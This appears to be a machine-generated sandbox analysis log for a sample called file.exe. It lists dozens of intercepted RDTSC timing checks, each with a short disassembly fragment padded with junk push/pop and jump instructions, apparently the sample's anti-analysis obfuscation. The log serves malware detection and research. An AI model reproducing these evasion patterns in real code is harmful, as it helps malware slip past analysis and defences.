              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1703D second address: A17042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24C92 second address: A24CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FC7B8E46E58h 0x0000000b jng 00007FC7B8E46E46h 0x00000011 popad 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24CBC second address: A24CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24CC1 second address: A24CD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FC7B8E46E46h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A24CD0 second address: A24CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC7B8E88BF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BB31 second address: A3BB35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AAA4 second address: A3AACA instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC7B8E88BF6h 0x00000008 jmp 00007FC7B8E88BFAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007FC7B8E88BFEh 0x00000015 jnl 00007FC7B8E88BF6h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AD79 second address: A3AD89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7B8E46E4Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AD89 second address: A3AD8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AD8D second address: A3AD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3AD93 second address: A3ADA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jg 00007FC7B8E88BF6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B496 second address: A3B4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E46E50h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B4AF second address: A3B4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7B8E88BFBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B647 second address: A3B680 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7B8E46E4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC7B8E46E57h 0x0000000f jmp 00007FC7B8E46E52h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B680 second address: A3B698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C04h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B698 second address: A3B6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B6A5 second address: A3B6AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B841 second address: A3B845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B845 second address: A3B84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D08B second address: A3D090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D090 second address: A3D0AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC7B8E88C07h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CDED second address: 91CDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FCDC second address: A3FD34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FC7B8E88C02h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FC7B8E88BFCh 0x00000012 jmp 00007FC7B8E88C04h 0x00000017 popad 0x00000018 nop 0x00000019 and dh, FFFFFF9Ch 0x0000001c push 00000004h 0x0000001e movsx edx, cx 0x00000021 call 00007FC7B8E88BF9h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 je 00007FC7B8E88BF6h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FD34 second address: A3FD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FD39 second address: A3FD3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FD3F second address: A3FD5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FD5B second address: A3FD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FD5F second address: A3FD69 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7B8E46E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FD69 second address: A3FD81 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC7B8E88BFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FD81 second address: A3FD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FD8A second address: A3FD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FD8E second address: A3FDA7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7B8E46E4Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3FFF5 second address: A400AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88BFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FC7B8E88BF8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov dx, 5E46h 0x00000028 push dword ptr [ebp+122D369Ah] 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FC7B8E88BF8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 and dl, FFFFFFCCh 0x0000004b mov dword ptr [ebp+122D36D6h], esi 0x00000051 call 00007FC7B8E88BF9h 0x00000056 jne 00007FC7B8E88BFEh 0x0000005c push eax 0x0000005d push eax 0x0000005e jmp 00007FC7B8E88BFBh 0x00000063 pop eax 0x00000064 mov eax, dword ptr [esp+04h] 0x00000068 jnc 00007FC7B8E88C00h 0x0000006e mov eax, dword ptr [eax] 0x00000070 push eax 0x00000071 push edx 0x00000072 jns 00007FC7B8E88BF8h 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A429DC second address: A429E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A429E2 second address: A429EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC7B8E88BF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DC18 second address: 95DC2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DC2C second address: 95DC36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC7B8E88BF6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DE57 second address: 95DE5D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0306 second address: 49C0353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 pushfd 0x00000006 jmp 00007FC7B8E88C03h 0x0000000b or eax, 7692ACFEh 0x00000011 jmp 00007FC7B8E88C09h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC7B8E88BFDh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C03BE second address: 49C03F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC7B8E46E53h 0x00000012 mov ax, F4AFh 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C03F7 second address: 49C03FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07D4 second address: 49E07E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07E3 second address: 49E0836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC7B8E88BFCh 0x00000012 sbb ch, 00000048h 0x00000015 jmp 00007FC7B8E88BFBh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007FC7B8E88C06h 0x00000023 adc ecx, 38BA30A8h 0x00000029 jmp 00007FC7B8E88BFBh 0x0000002e popfd 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0836 second address: 49E0844 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E09DB second address: 49E0A37 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edx, eax 0x0000000c pushfd 0x0000000d jmp 00007FC7B8E88BFCh 0x00000012 sub ch, 00000028h 0x00000015 jmp 00007FC7B8E88BFBh 0x0000001a popfd 0x0000001b popad 0x0000001c nop 0x0000001d jmp 00007FC7B8E88C06h 0x00000022 push dword ptr [ebp+08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FC7B8E88C07h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0A80 second address: 49E0ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, cl 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a cmp dword ptr [ebp-04h], 00000000h 0x0000000e jmp 00007FC7B8E46E57h 0x00000013 mov esi, eax 0x00000015 jmp 00007FC7B8E46E56h 0x0000001a je 00007FC7B8E46EA4h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC7B8E46E57h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0B3C second address: 49E0B70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7B8E88BFFh 0x00000009 add ax, B21Eh 0x0000000e jmp 00007FC7B8E88C09h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0B70 second address: 49E0019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop esi 0x00000008 jmp 00007FC7B8E46E4Ch 0x0000000d leave 0x0000000e pushad 0x0000000f mov di, cx 0x00000012 mov bx, si 0x00000015 popad 0x00000016 retn 0004h 0x00000019 nop 0x0000001a sub esp, 04h 0x0000001d xor ebx, ebx 0x0000001f cmp eax, 00000000h 0x00000022 je 00007FC7B8E46F95h 0x00000028 xor eax, eax 0x0000002a mov dword ptr [esp], 00000000h 0x00000031 mov dword ptr [esp+04h], 00000000h 0x00000039 call 00007FC7BD0A299Bh 0x0000003e mov edi, edi 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FC7B8E46E55h 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0019 second address: 49E0075 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7B8E88C07h 0x00000009 add ecx, 1667F10Eh 0x0000000f jmp 00007FC7B8E88C09h 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC7B8E88C09h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0075 second address: 49E0085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7B8E46E4Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0085 second address: 49E00A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FC7B8E88BFCh 0x0000000f mov edi, ecx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov edx, esi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E00A4 second address: 49E012C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC7B8E46E54h 0x00000008 adc ecx, 4B750778h 0x0000000e jmp 00007FC7B8E46E4Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007FC7B8E46E58h 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007FC7B8E46E57h 0x00000026 push FFFFFFFEh 0x00000028 pushad 0x00000029 mov ecx, 2586409Bh 0x0000002e push esi 0x0000002f pushad 0x00000030 popad 0x00000031 pop ebx 0x00000032 popad 0x00000033 push 45447635h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC7B8E46E54h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E012C second address: 49E0149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, D444h 0x00000007 movsx edx, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d add dword ptr [esp], 30822813h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movsx edi, cx 0x0000001a mov bl, ch 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0149 second address: 49E0181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FC7B8E46E49h 0x0000000e jmp 00007FC7B8E46E50h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0181 second address: 49E0187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0187 second address: 49E01EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov dx, 1734h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FC7B8E46E4Ah 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007FC7B8E46E4Bh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007FC7B8E46E52h 0x00000028 pushfd 0x00000029 jmp 00007FC7B8E46E52h 0x0000002e sub ax, 4F48h 0x00000033 jmp 00007FC7B8E46E4Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E01EC second address: 49E01F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E01F1 second address: 49E022D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC7B8E46E55h 0x0000000a adc ecx, 25BA6466h 0x00000010 jmp 00007FC7B8E46E51h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E022D second address: 49E0240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88BFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0240 second address: 49E0246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0246 second address: 49E024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E024A second address: 49E0264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000000h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC7B8E46E4Ah 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0264 second address: 49E02BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov bl, DAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FC7B8E88C04h 0x00000011 push eax 0x00000012 jmp 00007FC7B8E88BFBh 0x00000017 nop 0x00000018 jmp 00007FC7B8E88C06h 0x0000001d sub esp, 18h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007FC7B8E88BFDh 0x00000028 push esi 0x00000029 pop edx 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E02BD second address: 49E02FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FC7B8E46E4Eh 0x0000000f push eax 0x00000010 jmp 00007FC7B8E46E4Bh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC7B8E46E50h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E02FE second address: 49E0302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0302 second address: 49E0308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0308 second address: 49E030E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E030E second address: 49E0312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0312 second address: 49E034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a push esi 0x0000000b mov ax, di 0x0000000e pop edx 0x0000000f mov ebx, esi 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ch, 6Dh 0x00000018 pushfd 0x00000019 jmp 00007FC7B8E88BFDh 0x0000001e xor ch, 00000066h 0x00000021 jmp 00007FC7B8E88C01h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E034E second address: 49E03D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC7B8E46E4Ah 0x00000012 sbb si, 1238h 0x00000017 jmp 00007FC7B8E46E4Bh 0x0000001c popfd 0x0000001d jmp 00007FC7B8E46E58h 0x00000022 popad 0x00000023 mov edx, esi 0x00000025 popad 0x00000026 xchg eax, edi 0x00000027 pushad 0x00000028 call 00007FC7B8E46E4Ah 0x0000002d jmp 00007FC7B8E46E52h 0x00000032 pop eax 0x00000033 mov si, di 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC7B8E46E53h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E03D7 second address: 49E0434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E88C09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC7B8E88BFEh 0x0000000f mov eax, dword ptr [75C74538h] 0x00000014 jmp 00007FC7B8E88C00h 0x00000019 xor dword ptr [ebp-08h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC7B8E88C07h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0434 second address: 49E04F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b jmp 00007FC7B8E46E57h 0x00000010 nop 0x00000011 jmp 00007FC7B8E46E56h 0x00000016 push eax 0x00000017 pushad 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007FC7B8E46E4Ch 0x0000001f xor cx, 2538h 0x00000024 jmp 00007FC7B8E46E4Bh 0x00000029 popfd 0x0000002a pop eax 0x0000002b call 00007FC7B8E46E59h 0x00000030 mov cx, 9E57h 0x00000034 pop esi 0x00000035 popad 0x00000036 nop 0x00000037 jmp 00007FC7B8E46E53h 0x0000003c lea eax, dword ptr [ebp-10h] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FC7B8E46E55h 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E04F0 second address: 49E0500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7B8E88BFCh 0x00000009 rdtsc
